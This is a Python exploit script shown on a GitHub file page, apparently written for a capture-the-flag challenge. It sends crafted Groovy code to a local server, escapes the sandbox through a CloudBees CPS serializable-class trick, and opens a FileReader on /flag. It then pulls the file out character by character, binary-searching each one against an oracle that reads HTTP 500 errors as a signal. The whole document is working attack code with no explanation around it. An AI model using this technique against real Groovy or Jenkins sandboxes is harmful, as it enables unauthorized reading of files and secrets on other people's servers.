-
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexp_read.py
64 lines (52 loc) · 1.18 KB
/
exp_read.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
from time import sleep
import requests
url = 'http://localhost/'
exp = '''
package com.cloudbees.groovy.cps
class SerializableScript {
def x
def y
SerializableScript(FileReader f,Throwable t) { this.x = f;this.y=t }
}
class Subclass extends SerializableScript {
Subclass() { super(['/flag'],['114514']) }
}
def e=new Subclass().x
e.skip([SKIP])
def c=e.read()
if(c>[TARGET]){
throw new Subclass().y
}
'''
def getexp(pos, target):
return exp.replace('[SKIP]', str(pos)).replace('[TARGET]', str(target))
def divide(start, to):
# (start,to]
return start+int((to-start)/2)
def check(pos, target):
print(' [+]', pos, target)
r = requests.get(url, data=getexp(pos, target))
if r.status_code == 500:
return True
return False
flag = ''
for pos in range(32):
print('[+]', pos)
start = 31 # (
end = 65535 # ]
# check >128?
if check(pos, 128):
start = 128
else:
end = 128
while end - start != 1:
p = divide(start, end)
# check >p?
# sleep(1)
if check(pos, p):
start = p
else:
end = p
flag += chr(end)
print(chr(end), flag)
# sleep(3)